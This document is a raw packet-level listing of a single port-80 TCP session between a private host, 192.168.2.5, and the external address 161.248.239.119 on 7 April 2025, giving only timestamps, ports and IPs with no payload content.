Apr 7, 2025 08:37:09.775032997 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.775044918 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.775057077 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.775079012 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.775109053 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.816951036 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.816998005 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.817012072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.817070961 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:09.824979067 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.824995041 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:09.825097084 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.113934040 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.113954067 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114017963 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.114128113 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114552975 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114614010 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.114797115 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114819050 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114850044 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114864111 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114873886 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.114890099 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114911079 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.114921093 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.114974976 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.115660906 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115685940 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115726948 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115740061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115740061 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.115767956 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115782022 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115798950 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.115808964 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115825891 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.115842104 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.115873098 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.157624960 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.157639027 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.157757044 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.157866955 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.157938957 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.158004045 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.165566921 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.165580988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.165630102 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.453505993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.453526020 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.453659058 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.454312086 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454328060 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454418898 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.454556942 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454636097 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454651117 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454672098 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454685926 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.454715967 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.454741955 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454757929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.454790115 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.455523014 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455714941 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455729008 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455768108 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.455787897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455806017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455826998 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455838919 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.455842972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.455858946 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.455885887 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.497128010 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.497143030 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.497226000 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.497246027 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.497262001 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.497272968 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.497344017 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.505403996 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.505465031 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.505609035 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.505662918 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.793478966 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.793499947 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.793560028 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.793607950 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794250011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794290066 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794300079 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794328928 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794367075 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794411898 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794434071 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794475079 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794502974 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794517994 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794548035 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794559956 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794569016 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794610023 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.794697046 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.794739962 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.796088934 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.796104908 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.796142101 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.796142101 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.796159983 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.796166897 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.796183109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.796191931 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.796200991 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.796228886 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:10.838747025 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:10.838844061 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.134849072 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.134866953 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.134886026 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.134927034 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.134964943 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.134989977 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.135042906 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.135198116 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.135210991 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.135230064 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.135246992 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.135273933 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.135384083 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.135432005 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.138060093 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.138086081 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.138099909 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.138113976 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.138151884 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.138151884 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.138334990 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.138350964 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.138379097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.138396025 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.478621960 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.478642941 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.478662014 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.478758097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.478832960 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.480998039 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.481060982 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.582341909 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.582411051 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.820339918 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.820379972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.820405006 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.820429087 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:11.820439100 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.820471048 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:11.820544004 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.160738945 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160772085 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160789967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160803080 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160811901 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.160828114 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160854101 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160862923 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.160867929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.160896063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.160934925 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.222743988 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.222800970 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.502573967 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502602100 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502672911 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502690077 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502723932 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502743006 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502763987 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502788067 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.502821922 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.502821922 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.502876997 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.502876997 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.843517065 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843535900 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843554974 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843588114 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843594074 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.843602896 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843626976 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843638897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843652010 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.843664885 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843681097 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:12.843692064 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.843712091 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:12.884689093 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.185340881 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185360909 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185424089 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.185430050 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185444117 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185472965 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185487986 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185525894 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.185527086 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185542107 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185548067 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.185566902 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.185585976 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.226377964 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.226449966 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.528142929 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528170109 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528193951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528208971 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528227091 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528255939 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.528291941 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.528304100 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528316975 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528338909 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.528354883 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.528387070 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.566252947 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.566281080 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.566304922 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.566371918 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.868403912 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868421078 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868457079 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868473053 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.868552923 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868608952 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.868685961 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868737936 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868763924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868777037 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.868786097 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.868822098 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.906232119 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.906248093 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.906279087 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.906295061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:13.906326056 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:13.906491995 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.208046913 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208066940 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208123922 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.208354950 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208369017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208439112 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.208456993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208470106 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208506107 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.208507061 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208523035 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.208570004 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.247344017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.247385979 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.247453928 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.247565985 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.247580051 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.247634888 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.547663927 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547691107 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547709942 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547729015 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547764063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.547813892 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.547863007 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547880888 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.547940969 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.547977924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.548003912 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.548048019 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.548058987 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.586936951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.586972952 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.586988926 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.587068081 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.587135077 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.587141991 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.634637117 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.887124062 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887325048 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887347937 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887363911 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887377024 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887393951 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887407064 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887439966 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887442112 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.887459993 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.887482882 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.887482882 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.887769938 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.926816940 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.926903963 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.927315950 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.927341938 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.927365065 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.927397966 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:14.976491928 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:14.976556063 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.227298021 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227339983 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227360010 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227372885 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227396011 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227411985 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227430105 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227444887 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227545023 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.227612019 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227689028 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.227735043 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.270071983 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.270087004 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.270148993 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.270266056 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.319325924 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.319343090 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.319428921 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.567677021 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567725897 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567744017 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567826033 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.567857981 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567919016 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.567924023 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567940950 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:15.567984104 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:15.567990065 CEST	80	49691	161.248.239.119	192.168.2.5
